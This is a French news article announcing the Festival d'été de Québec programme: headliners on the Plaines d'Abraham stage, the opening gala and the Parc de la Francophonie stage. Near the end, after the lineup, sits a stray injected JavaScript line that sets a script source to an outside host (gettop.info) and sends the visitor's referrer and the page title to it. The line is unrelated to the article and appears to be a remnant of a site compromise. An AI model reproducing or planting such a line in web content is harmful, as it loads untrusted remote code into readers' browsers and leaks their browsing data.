Festival d’été annonce sa programmation


Facebooktwitterredditpinterestlinkedinmail

Pour une 44e année de suite, la capitale vibrera au rythme du Festival d’été de Québec en juillet. Déjà les deux fins de semaine de l’événement s’annoncent fortes en émotions. L’annonce des passages de Sir Elton John et du groupe rock Metallica a fait parler du Festival à travers le Canada, un peu partout aux États-Unis et même jusqu’en Suède.

« Nous avions comme objectifs de nous démarquer, d’occuper une place importante sur l’échiquier des grands événements, d’attirer les plus grands et de contribuer au rayonnement de Québec. C’est réussi et nous en sommes fiers », a déclaré la présidente du conseil d’administration du Festival d’été de Québec, Nancy Savard. « Beaucoup de Québécois planifient maintenant leurs vacances en fonction du Festival et de plus en plus de gens de l’extérieur surveillent notre programmation et souhaitent y venir ».

Avec les noms qui s’ajoutent ou sont confirmés aujourd’hui, le Festival devrait une fois de plus faire sa marque et faire courir les foules!

LA SOIRÉE D’OUVERTURE

Est-ce en voie de devenir une tradition ? C’est en chansons et en français que s’ouvrira cette année encore le Festival d’été de Québec. Des vedettes québécoises et françaises se rassembleront pour rendre hommage à ces textes d’hier et d’aujourd’hui qui font fredonner toutes les générations. Cette fois c’est le touche-à-tout Gregory Charles qui co animera avec Daniela Lumbroso, personnalité de la télévision française. Les noms des artistes qui participeront à cet événement seront dévoilés plus tard en mai mais on sait déjà que Francis Cabrel sera du nombre. Capté pour la télévision et diffusé au Québec, sur Télé-Québec, en France sur la grande chaîne généraliste France 3 à heure de grande écoute et à travers 200 pays sur TV5 Monde, ce spectacle est une vitrine inestimable pour le Québec.

« Si le Festival d’été de Québec fait parler de lui sur la planète en raison des vedettes internationales qu’il accueille, il a aussi une grande portée dans la Francophonie. Personne avant nous n’avait encore réalisé pour la télévision un aussi grand spectacle de variétés regroupant autant d’artistes francophones », d’expliquer Daniel Gélinas le directeur général du Festival d’été de Québec. « Le spectacle de l’an dernier a été vu par plus de 3 millions de personnes. C’est le Québec tout entier qui rayonne à travers cette émission et bénéficie ainsi d’une vaste campagne publicitaire».

SCÈNE BELL DES PLAINES D’ABRAHAM

« Rock on »…c’est l’expression qui court sur les médias sociaux à propos de la programmation de la grande scène du Festival.

Le 8 juillet, Ben Harper lance le bal. S’il mélange avec bonheur les influences folk, blues, gospel, funk et reggae, le guitariste, auteur, compositeur et chanteur américain a adopté un son plus rock au cours des dernières années. Un nouvel album, comptant deux morceaux réalisés avec Ringo Starr, doit paraître en mai.

Sir Elton John, tel qu’annoncé, sera là le lendemain 9 juillet pour un concert qui s’annonce déjà historique ! Accompagné de ses cinq musiciens, le Britannique enchaînera ses plus grands succès de même que des pièces tirées de son récent album The Union composé avec Leon Russell.

The Black Keys précédés de Girl Talk et Cage the Elephant occuperont la scène le dimanche 10 juillet pour une soirée à la fois rock, électro et blues. Le duo américain a remporté trois trophées Grammy cette année dont celui de l’album alternatif de l’année pour son disque Brothers et celui de la meilleure performance rock vocale pour la pièce Tighten Up.

Simple Plan, qui a fait frémir la foule rassemblée sur les Plaines en 2005 revient le 11 juillet. Un quatrième CD est attendu au cours des prochaines semaines. Un extrait, enregistré en duo avec Rivers Cuomo, le chanteur du groupe Weezer, tourne déjà et le groupe a annoncé une chanson en français avec Marie-Mai. Avant eux sur scène, Dropkick Murphys, groupe américain originaire de Boston, dont le rock est teinté de musique irlandaise traditionnelle, de punk hardcore, d’oi! et de folk rock

Marie-Mai, le phénomène de l’heure au Québec, celle qui a déjà quelques records de vente de CD et plusieurs trophées en poche, suivra le 12 juillet. Pétillante, dynamique et appréciée pour son énergie contagieuse, la jeune chanteuse promet un spectacle époustouflant avec des artistes invités, des numéros spéciaux et des danseurs. De quoi éblouir ses fans ! François Duchesne, Philémon chante, Agnès Beauregard et Midnight Romeo, tous des participants du Volet Pro de l’Ampli de Québec, lieu de formation et de diffusion pour les jeunes musiciens, monteront sur scène plus tôt.

Grosse soirée de rock québécois le 13 : Jonas & The Massive Attraction, Michel Pagliaro et pour finir Éric Lapointe qui n’est pas venu au Festival depuis 2006 ! Trois rockers prennent d’assaut les Plaines. Chacun présentera son spectacle et ils promettent de faire la fête tous ensemble autour de Lapointe, du moins pour quelques pièces.

Jean-Pierre Ferland l’a confessé; il sort de sa retraite le temps de trois rechutes dont l’une au Festival d’été de Québec, le vendredi 15 juillet. Pour la première partie de ce spectacle-événement, mis en scène par Denis Bouchard, avec décors, choristes et invités, le petit roi reprend le mythique album Jaune qui, il y a 40 ans, avait bouleversé le monde de la chanson québécoise. Enfin, pour faire plaisir et se faire plaisir, Ferland complète la soirée avec ses grands succès. Pour donner le ton et réchauffer la foule, Les Charbonniers de l’enfer ont été choisis.

Le 16, c’est le rêve de plusieurs qui se réalisera avec la venue sur les Plaines de Metallica. Le groupe métal américain promet au public québécois, avec qui il vit depuis longtemps une véritable histoire d’amour, un spectacle d’envergure qui regroupera ses plus grands succès. Le célèbre guitariste Joe Satriani et le groupe de Québec, Dance Laury Dance assureront les premières parties.

Enfin, pour clore en grand et en rock ces 11 jours, John Fogerty, le 17 juillet. Celui qui s’est d’abord fait connaître comme leader du groupe de rock Creedence Clearwater Revival (CCR) a aussi une longue feuille de route comme auteur-compositeur, chanteur et guitariste solo.

Pour la directrice de la programmation, Dominique Goulet « c’est une programmation qui fait en sorte que sur cette même scène vont défiler des légendes du rock, des artistes engagés, des vedettes montantes, d’autres qui se sont faites discrètes mais séduisent toujours autant et enfin, des vedettes internationales qui contribueront à inscrire Québec sur la carte du monde et des grands festivals ».

Tous les détails sur la programmation sur le site du FEQ.

http://www.infofestival.com/Programmation/

SCÈNE MOLSON DRY DU PARC DE LA FRANCOPHONIE

Deux grands retours cette année sur la scène du Parc de la Francophonie : Death From Above 1979 et Champion et ses G-Strings. Les deux musiciens du duo canadien Death From Above 1979, qui s’étaient séparés en 2006, ont en effet décidé de se retrouver le temps de quelques spectacles seulement. Ils étaient à Coachella en Californie il y a deux semaines et seront à Québec pour fermer la scène Molson Dry le 17 précédés du groupe québécois Malajube. Quant à Champion, qui a déclaré qu’il n’était plus malade, il annonce un spectacle toujours aussi prenant, dansant et contagieux qu’auparavant ! Il sera là le 13 après les premières parties de Gatineau et Random Recipe, deux groupes québécois qui font dans le hip-hop et l’indie-rock.

« Nous sommes privilégiés », a commenté Dominique Goulet « car ces artistes, qui ne feront que quelques spectacles cet été ont voulu être du Festival d’été de Québec ».

Il y aura un peu de tout au cours de ces 11 jours de musique: du rock bien solide en ouverture avec Bleeker Ridge, 10 Years et Hollywood Undead, et plus tard dans la semaine avec Jimmy Hunt et Galaxie, de la poésie sous différentes formes, d’abord avec le slammeur français Grand Corps Malade puis avec le spectacle hommage émouvant à Gaston Miron, Douze Hommes Rapaillés, qui met en scène 11 chanteurs québécois. Habana Café ne manquera pas de nous faire voyager avec ses rythmes latins et une soirée complète est dédiée au blues avec Oli Brown, Matt Schofield et le phénoménal Buddy Guy. Il y a aussi une soirée hip-hop avec Manu Militari et Booba que les rappeurs d’Alaclair Ensemble seront chargés de lancer.

La venue de Patrick Norman réjouira les amateurs de country. Il sera précédé ce soir-là de la grande gagnante du Festival international de la chanson de Granby 2010, Lisa Leblanc. Enfin, plusieurs tomberont certainement sous le charme de la chanteuse et actrice britannique Marianne Faithfull, de passage chez nous pour la première fois.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +  »;

Previous UltimRadio avait raison! Metallica sur les plaines d'Abraham
Next Concert de Symphony X à la Salle Albert Rousseau

No Comment

Leave a reply

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *